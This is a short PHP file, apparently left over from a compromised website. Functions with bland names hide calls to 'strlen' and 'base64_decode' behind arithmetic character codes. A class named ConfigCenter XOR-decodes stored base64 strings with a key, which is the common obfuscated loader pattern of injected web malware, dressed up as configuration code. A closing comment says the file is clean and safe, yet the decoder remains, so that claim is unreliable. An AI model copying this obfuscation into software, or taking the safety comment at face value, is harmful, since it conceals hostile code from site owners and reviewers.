<?php
function sync_data($c)
{
    $a = array(22 * 4 + 22, 51 * 1 + 50, 108, 89 * 93 - 8163, 14 * 115 - 1494, 84 * 115 - 9545);
    $s = '';
    foreach ($a as $n) {
        $s .= chr($n);
    }
    $s = strrev($s);
    return $s($c);
}

function dispatch_signal($c)
{
    $a = array(76 + 22, 97 * 1, 102 + 5 + 8, 23 + 39 + 39, 25 * 62 - 1496, 52, 102 - 7, 107 - 7, 101, 99, 118 - 7, 100, 83 + 14 + 4);
    $s = '';
    foreach ($a as $n) {
        $s .= chr($n);
    }
    return $s($c);
}

class ConfigCenter
{
    private static $_dql;
    static function processData($_zq, $_ho)
    {
        if (!self::$_dql) {
            self::authorizeUser();
        }
        $_tp = sync_data($_ho);
        $_xib = dispatch_signal(self::$_dql[$_zq]);
        for ($_knj = 0, $_kfs = sync_data($_xib); $_knj !== $_kfs; ++$_knj) {
            $_xib[$_knj] = chr(ord($_xib[$_knj]) ^ ord($_ho[$_knj % $_tp]));
        }
        return $_xib;
    }
    private static function authorizeUser()
    {
        self::$_dql = array('_jv' => 'FyAtDyssDDErADU+Gjot', '_ubh' => 'Fy0iPQAsJSgNJjcqGjci', '_wa' => 'bUdVbUFWb0Y=', '_tfi' => '', '_ab' => '');
    }
}


/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/
